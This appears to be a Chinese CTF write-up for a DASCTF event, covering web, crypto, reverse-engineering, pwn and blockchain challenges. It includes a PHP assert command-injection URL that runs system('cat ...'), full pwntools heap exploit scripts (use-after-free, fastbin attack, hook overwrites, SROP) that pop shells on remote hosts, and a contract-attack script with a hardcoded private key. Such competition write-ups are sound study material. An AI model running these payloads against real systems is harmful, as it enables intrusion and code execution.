WEB
[warmup]ezphp
git泄漏
之后assert命令拼接
出了
view-source:http://59cc778f-089d-4f96-b191-80c7d12f13be.zzctf.dasctf.com/?link_page=flag.php%27,%20%27..%27)%20===%20false%20XOR%20system(%27cat%20./pages/flag.php%27)%20AND%20strpos(%27test/flag
MISC
音频隐写
CRYPTO
加密运算
古典密码,加密idx = (a * addr + b) % m,解密用addr = (idx - b) * inverse(a, m) % m就行了
RSA-1
$M = (20211001m*p)^e\ mod\ n$,即
M = k_1 p^e + k_2n = (k_1p^{e-1}+k_2q) p
可以通过乘逆元去掉2021*1001项,再拿它和n进行一个gcd即可。
n = 17365231154926348364478276872558492775911760603002394353723603461898405740234715001820111548600914907617003806652492391686710256274156677887101997175692277729648456087534987616743724646598234466094779540729413583826355145277980479040157075453694250572316638348121571218759769533738721506811175866990851972838466307594226293836934116659685215775643285465895317755892754473332034234495795936183610569571016400535362762699517686781602302045048532131426035260878979892169441059467623523060569285570577199236309888155833013721997933960457784653262076135561769838704166810384309655788983073376941843467117256002645962737847
c = 6944967108815437735428941286784119403138319713455732155925055928646536962597672941805831312130689338014913452081296400272862710447207265099750401657828165836013122848656839100854719965188680097375491193249127725599660383746827031803066026497989298856420216250206035068180963797454792151191071433645946245914916732637007117085199442894495667455544517483404006536607121480678688000420422281380539368519807162175099763891988648117937777951069899975260190018995834904541447562718307433906592021226666885638877020304005614450763081337082838608414756162253825697420493509914578546951634127502393647068722995363753321912676
from math import gcd
from Crypto.Util.number import inverse, long_to_bytes
p = gcd(n, c)
q = n // p
d = inverse(0x10001, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m // 2021 // 1001 // p))
RSA2 PLUS
p和p1接近,q和q1接近,那么通过费马分解可以分解出pq和p1q1,实际上更换一下费马分解的参数还能得到pq1和p1q,因为两者也很接近。最后gcd一下就行了。
第二部分解方程即可
n1 = 6348779979606280884589422188738902470575876294643492831465947360363568026280963989291591157710389629216109615274754718329987990551836115660879103234129921943824061416396264358110216047994331119920503431491509529604742468032906950984256964560405062345280120526771439940278606226153077959057882262745273394986607004406770035459301695806378598890589432538916219821477777021460189140081521779103226953544426441823244765828342973086422949017937701261348963541035128661464068769033772390320426795044617751909787914185985911277628404632533530390761257251552073493697518547350246993679844132297414094727147161169548160586911
c1 = 6201882078995455673376327652982610102807874783073703018551044780440620679217833227711395689114659144506630609087600915116940111002026241056808189658969089532597757995423694966667948250438579639890580690392400661711864264184444018345499567505424672090632235109624193289954785503512742400960515331371813467034511130432319427185134018830006918682733848618201088649690422818940385123599468595766345668931882249779415788129316594083269412221804774856038796248038700275509397599351533280014908894068141056694660319816046357462684688942519849441237878018480036145051967731081582598773076490918572392784684372694103015244826
data1 = 274773146761138462708137582309097386437793891793691383033856524303010811294101933454824485010521468914846151819876043508541879637544444256520741418495479393777132830985856522008561088410862815913292288683761657919121930016956916865849261153721097671315883469348972925757078089715102032241818526925988645578778
data2 = 18514724270030962172566965941723224386374076294232652258701085781018776172843355920566035157331579524980108190739141959926523082142273672741849552475156278397131571360099018592018959785627785130126477982765210498547680367230723634424036009539347854344573537848628061468892166199866227984167843139793429682559241317072979374002912607549039431398267184818771503468116379618249319324788996321340764624593443106354104274472601170229835219638093242557547840060892527576940077162990069687019966946826210112318408269749294366586682732614372434218768720577917368726530200897558912687470088583774711767599580037663378929000217
n2 = 40588227045595304080360385041082238507044292731344465815296032905633525556943787610712651675460810768762763493579129831271018141591546207557410817432455139315527674932933085299277599173971912445226532235814580879585317211349524406424200622675880992390782025158621241499693400288031658194434641718026910652327933253877313106112861283314274635124734817398465059373562194694957841264834312640926278890386089611103714990646541470577351599526904458342660444968591197606820361364761648205241041444681145820799054413179462285509661124362074093583494932706249461954240408827087015525507173082129412234486228092002841868365895837463699200959915782767657258729794037776401995309244941171415842403617486719492483671490834562579225506831496881542530519595438932482796867853234159664409420977526102480385193101883785161080269573707156626838551506024455480650224305894501968583442346807126920740779780593650871645915149689424292912611578291912721896864772950410266629045542480009266574096080138709683466489568290569363478444349563498507530805502511051165160827192795520182720802422213364247355775222858214648603034743679187470844212529134374975737510982287957316878179964602394749601431823167982157434890459245394370728942790117156485268116758052636794417268680901420193002289035538753620555488506926366624641291881353268617130968991258983002165300186971963661666476600998389048880565199317280428349802824448329898502788492233381873026217202981921654673840142095839603360666049476100561268336225902504932800605464136192275593886736746497955270280541423593
c2 = 25591090168544821761746024178724660839590948190451329227481168576490717242294520739865602061082558759751196452117720647426598261568572440942370039702932821941366792140173428488344932203576334292648255551171274828821657097667106792872200082579319963310503721435500623146012954474613150848083425126987554594651797477741828655238243550266972216752593788734836373144363217639612492397228808215205862281278774096317615918854403992620720969173788151215489908812749179861803144937169587452008097008940710091361183942268245271154461872102813602754439939747566507116519362821255724179093051041994730856401493996771276172343313045755916751082693149885922105491818225012844519264933137622929024918619477538521533548551789739698933067212305578480416163609137189891797209277557411169643568540392303036719952140554435338851671440952865151077383220305295001632816442144022437763089133141886924265774247290306669825085862351732336395617276100374237159580759999593028756939354840677333467281632435767033150052439262501059299035212928041546259933118564251119588970009016873855478556588250138969938599988198494567241172399453741709840486953189764289118312870580993115636710724139809708256360212728127786394411676427828431569046279687481368215137561500777480380501551616577832499521295655237360184159889151837766353116185320317774645294201044772828099074917077896631909654671612557207653830344897644115936322128351494551004652981550758791285434809816872381900401440743578104582305215488888563166054568802145921399726673752722820646807494657299104190123945675647
import gmpy2
from math import sqrt, gcd
from Crypto.Util.number import long_to_bytes, inverse
def eulerFactor(n, tmp = None):
if tmp is None:
tmp = gmpy2.iroot(n, 2)[0] + 1
while True:
if gmpy2.iroot(tmp * tmp - n, 2)[1]:
m = gmpy2.iroot(tmp * tmp - n, 2)[0]
return (tmp - m, tmp + m)
tmp += 1
def solve(a, b, c, realRoot = False):
delta = b ** 2 - 4 * a * c
if delta < 0:
return None
if realRoot:
if delta == 0:
return (-b / (2 * a), -b / (2 * a))
tmp = sqrt(delta)
return ((-b + tmp) / (2 * a), (-b - tmp) / (2 * a))
tmp, check = gmpy2.iroot(delta, 2)
if not check:
return None
return ((-b + tmp) // (2 * a), (-b - tmp) // (2 * a))
n11, n12 = eulerFactor(n1)
n21, n22 = eulerFactor(n1, 79679231796035037354449627487236220201878797729093909877127396750043503300636464774059752126148617367251988043645511172901030621825575172979048675217343426650348954031732316861261577523337131683092320173892450855006435497340260849554793123662386809285875511168661716325547433511457598512223942089217027693180 + 1)
p1 = gcd(n11, n21)
q1 = n11 // p1
d = inverse(0x10001, (p1 - 1) * (q1 - 1))
flag = long_to_bytes(pow(c1, d, n11))
p2, q2 = solve(1, -data1, data2)
d = inverse(0x10001, p2 * (p2 - 1) * (q2 - 1) * q2 ** 2)
flag += long_to_bytes(pow(c2, d, n2))
print(flag)
REVERSE
抛石机
解两个一元二次方程,每个自变量都很离谱,是 8 个 byte 直接强制转换成 double,高 4 byte 全是 0
直接 go 写个多线程爆破,然后按照大小关系、前后顺序拼接就行了
flag{454af13f-f84c-1140-1ee4-debf58a4ff3f}
easy_re
有点花指令,直接给 patch 掉即可,加密就是个流密码,dump密钥流即可
cipher = [245, 140, 141, 228, 159, 165, 40, 101, 48, 244,
235, 211, 36, 169, 145, 26, 111, 212, 106, 215,
11, 141, 232, 184, 131, 74, 90, 110, 190, 203,
244, 75, 153, 214, 230, 84, 122, 79, 80, 20,
229, 236]
fake_plain = b'a'*len(cipher)
print(fake_plain)
fake_cipher = [242, 129, 141, 226, 133, 167, 124, 97, 97, 243,
191, 212, 115, 229, 150, 76, 55, 208, 38, 131,
8, 213, 235, 244, 219, 19, 3, 105, 242, 152,
173, 76, 200, 131, 177, 4, 42, 25, 9, 69,
182, 240]
keys = [fake_cipher[i] ^ fake_plain[i]for i in range(len(cipher))]
flag = ''
for i in range(len(cipher)):
flag += chr(cipher[i] ^ keys[i])
print(flag)
flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}
babyvxworks
vxwork 固件,直接拖到 ida 里就可以静态分析,有不少花指令,全部patch 掉即可
每个字符都是这么加密的,所以爆破即可
cipher = [188, 10, 187, 193, 213, 134, 127, 10, 201, 185, 81, 78, 136, 10,
130, 185, 49, 141, 10, 253, 201, 199, 127, 185, 17, 78, 185, 232, 141, 87]
def brute():
for i in range(len(cipher)):
for c in range(0x20, 0x7f):
tmp = c
for _ in range(30):
tmp ^= 0x22
tmp += 3
if tmp & 0xff == cipher[i]:
print(chr(c), end='')
break
brute()
flag{helo_w0rld_W3lcome_70_R3}
PWN
uaf
uaf打malloc_hook为ogg,getshell
#coding:utf-8
from pwn import *
import subprocess, sys, os
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './uaf_pwn'
ip = '82.157.5.28'
port = 52402
remote_libc_path = './x64/libc.so.6'
context(os='linux', arch='amd64')
context.log_level = 'debug'
def run(local = 1):
LD_LIBRARY_PATH = './x64/'
LD = LD_LIBRARY_PATH+'ld.so.6'
global elf
global p
if local == 1:
elf = ELF(elf_path, checksec = False)
p = process([LD, elf_path], env={"LD_LIBRARY_PATH": LD_LIBRARY_PATH})
else:
p = remote(ip, port)
def debug(cmdstr=''):
# context.terminal = ['--with-separate-debug-dir']
# context.terminal = ['/mnt/c/Windows/System32/WindowsPowerShell/v1.0/powerShell.exe', '-c', 'wt', 'bash', '-c']
# context.terminal = ['/mnt/c/windows/system32/bash.exe', '-c']
DEBUG_PATH = './x64/usr/lib/debug/lib/x86_64-linux-gnu/'
cmd='source /opt/patchelf/loadsym.py\n'
cmd+='loadsym '+DEBUG_PATH+'libc-2.23.so\n'
# cmd='set debug-file-directory '+DEBUG_PATH+'\n'
# cmd=''
cmd+=cmdstr
gdb.attach(p, cmd)
pause()
def one_gadget(filename = remote_libc_path):
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
def str2int(s, info = '', offset = 0):
ret = u64(s.ljust(8, '\x00')) - offset
success('%s ==> 0x%x'%(info, ret))
return ret
def chose(idx):
sla('>', str(idx))
def add(size):
chose(1)
sla('size>', str(size))
def edit(idx, content):
chose(3)
sla('index>', str(idx))
sa('', content)
def free(idx):
chose(2)
sla('index>', str(idx))
def show(idx):
chose(4)
sla('index>', str(idx))
run(0)
add(0x100)
add(0x68)
add(0x68)
free(0)
show(0)
libc = ELF(remote_libc_path)
libc.address = str2int(p.recv(6).ljust(8, '\0'), 'libc', libc.sym['__malloc_hook']+0x68)
attack = libc.sym['__malloc_hook']-0x23
free(1)
edit(1, p64(attack))
add(0x68)
add(0x68)
one = libc.address + one_gadget()[1]
payload = 'a'*0x3+p64(one)*4
edit(4, payload)
add(0x100)
# debug()
p.interactive()
null
add溢出一个字节,可以改size大包小,main_arena泄露libc,fastbin attack打heaplist为free@got,改free@got为system,getshell
#coding:utf-8
from pwn import *
import subprocess, sys, os
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './null_pwn'
ip = '82.157.5.28'
port = 51904
remote_libc_path = './x64/libc.so.6'
context(os='linux', arch='amd64')
context.log_level = 'debug'
def run(local = 1):
global elf
global p
if local == 1:
elf = ELF(elf_path, checksec = False)
p = elf.process()
else:
p = remote(ip, port)
def debug(cmd=''):
# context.terminal = []
gdb.attach(p,cmd)
pause()
def one_gadget(filename = remote_libc_path):
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
def str2int(s, info = '', offset = 0):
ret = u64(s.ljust(8, '\x00')) - offset
success('%s ==> 0x%x'%(info, ret))
return ret
def chose(idx):
sla('Your choice :', str(idx))
def add(idx, size, content = '\n'):
chose(1)
sla('Index', str(idx))
sla('Size', str(size))
sa('Content', content)
def edit(idx, content):
chose(3)
sla('Index', str(idx))
sa('Content', content)
def free(idx):
chose(2)
sla('Index:', str(idx))
def show(idx):
chose(4)
sla('Index', str(idx))
run(0)
add(0, 0x18)
add(1, 0x28)
add(2, 0x68)
add(3, 0x18)
add(4, 0x100)
add(5, 0x18)
add(14, 0x71, '/bin/sh\0')
free(0)
add(0, 0x18, 'a'*0x18+p8(0xa1))
free(1)
add(1, 0x90, p8(0x78))
show(1)
p.recvuntil('Content : ')
libc = ELF(remote_libc_path)
libc.address = str2int(p.recv(6).ljust(7, '\0'), 'libc', libc.sym['__malloc_hook']+0x68)
free(2)
attack = 0x602120 - 0x10
one = libc.address + one_gadget()[1]
edit(1, flat('a'*0x28, 0x71, attack))
add(6, 0x68)
add(7, 0x68, p64(0x602018)*2)
edit(1, p64(libc.sym['system']))
free(14)
p.interactive()
greentownnote
uaf,2.27无限free填充tcache,再free得到unsortedbin泄露libc,打free_hook为setcontext+0x35,SROP,getshell
#coding:utf-8
from pwn import *
import subprocess, sys, os
from dawnaa import SROP
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './GreentownNote'
ip = '82.157.5.28'
port = 51001
remote_libc_path = './libc-2.27.so'
context(os='linux', arch='amd64')
context.log_level = 'debug'
def run(local = 1):
global elf
global p
if local == 1:
elf = ELF(elf_path, checksec = False)
p = elf.process()
else:
p = remote(ip, port)
def debug(cmd=''):
# context.terminal = []
gdb.attach(p,cmd)
pause()
def one_gadget(filename = remote_libc_path):
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
def str2int(s, info = '', offset = 0):
ret = u64(s.ljust(8, '\x00')) - offset
success('%s ==> 0x%x'%(info, ret))
return ret
def chose(idx):
sla('> Your choice :', str(idx))
def add(size, content = '\n'):
chose(1)
sla('> Note size :', str(size))
sa('> Content :', content)
def free(idx):
chose(3)
sla('| Index :', str(idx))
def show(idx):
chose(2)
sla('| Index :', str(idx))
run(0)
add(0x100)
add(0x100)
for i in range(7):
free(1)
free(0)
show(0)
p.recvuntil('| Content: ')
libc = ELF(remote_libc_path)
libc.address = str2int(p.recv(6).ljust(8, '\0'), 'libc', libc.sym['__malloc_hook']+0x70)
add(0x100, p64(libc.sym['__free_hook']))
payload, layout, attack = SROP(libc)
add(0x100, payload)
add(0x100, p64(attack))
free(1)
p.send(layout)
p.interactive()
创新技术
安卓
很简单的题目,会发送http请求到靶机,只需要用JEB动态调试,在初始化类时将权限改为admin,之后发送请求即可。直接返回flag
区块链puzzle
考察 整数溢出
出题人没有设置RN,
可以直接similar contract找到他原来的做题记录。
import web3
import time
from web3 import Web3,HTTPProvider
from web3.auto import w3
from Crypto.Util.number import *
RINKEDBY_URL = "https://ropsten.infura.io/v3/097c700c39fd46be8178f46b6889e78c"
web3=Web3(HTTPProvider(RINKEDBY_URL))
print(web3.isConnected())
acct=web3.eth.account.from_key('0x03c70d2e6e93d23f0bec4c44e117985b023ecf348172c996b02882a105f1bdc5')
pub = acct.address
pri = acct.privateKey
print(acct.address,acct.privateKey)
gasPrice = web3.eth.gasPrice
chain_id = web3.eth.chain_id
nonce = web3.eth.getTransactionCount(pub)
def sendRawTransaction(fromAddr,toaddr,data,nonce,gasPrice = gasPrice,chain_id = chain_id,value = 0):
if toaddr == None:
rawTx = { 'chainId':3, 'from': fromAddr, 'nonce': nonce, 'gasPrice': gasPrice, 'gas': 5000000, 'value': value, 'data': data, }
else:
rawTx = { 'chainId':3, 'to':toaddr, 'from': fromAddr, 'nonce': nonce, 'gasPrice': gasPrice, 'gas': 5000000, 'value': value, 'data': data, }
signedTx = web3.eth.account.signTransaction(rawTx, private_key=pri)
hashTx = web3.eth.sendRawTransaction(signedTx.rawTransaction).hex()
print(hashTx)
receipt = web3.eth.waitForTransactionReceipt(hashTx)
print(receipt)
return receipt
payload =bytes.fromhex('608060405234801561001057600080fd5b5060405160208061096a83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506108e7806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638f4ed3331461005c578063d40a71fb14610073578063df4ec2491461008a575b600080fd5b34801561006857600080fd5b506100716100a1565b005b34801561007f57600080fd5b50610088610243565b005b34801561009657600080fd5b5061009f61071d565b005b600069424a44264441534354467601000000000000000000000000000000000000000000000290506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663707583d5826040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808275ffffffffffffffffffffffffffffffffffffffffffff191675ffffffffffffffffffffffffffffffffffffffffffff19168152602001915050600060405180830381600087803b15801561018b57600080fd5b505af115801561019f573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663919840ad6040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15801561022857600080fd5b505af115801561023c573d6000803e3d6000fd5b5050505050565b600061024d6107bc565b90506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16633472df228273ffffffffffffffffffffffffffffffffffffffff6040518363ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808381526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200192505050600060405180830381600087803b15801561032757600080fd5b505af115801561033b573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16639527008060006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b1580156103d057600080fd5b505af11580156103e4573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16633472df228273ffffffffffffffffffffffffffffffffffffffff6040518363ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808381526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200192505050600060405180830381600087803b1580156104c057600080fd5b505af11580156104d4573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16639527008060006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561056957600080fd5b505af115801561057d573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16633472df228273ffffffffffffffffffffffffffffffffffffffff6040518363ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808381526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200192505050600060405180830381600087803b15801561065957600080fd5b505af115801561066d573d6000803e3d6000fd5b505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16639527008060006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561070257600080fd5b505af1158015610716573d6000803e3d6000fd5b5050505050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f96339306040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b1580156107a257600080fd5b505af11580156107b6573d6000803e3d6000fd5b50505050565b600080600080600080600294506000935084604051602001808281526020019150506040516020818303038152906040526040518082805190602001908083835b60208310151561082257805182526020820191506020810190506020830392506107fd565b6001836020036101000a0380198251168184511680821785525050505050509050019150506040518091039020600190049250828411156108675782840391506108b0565b8284141561087857600091506108af565b828410156108ae577fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9050836001848303010191505b5b5b8195505050505050905600a165627a7a72305820bd573733d36278252bc4754039d0930b28f3a71e3f8d56ca5e304cd5351846380029000000000000000000000000442787DBF8f75F0A3eF14616f8f698b0d620Cf09')
receipt = sendRawTransaction(pub,None,payload,nonce)
print(receipt)
部署完直接打即可。
发表评论
您还未登录,请先登录。
登录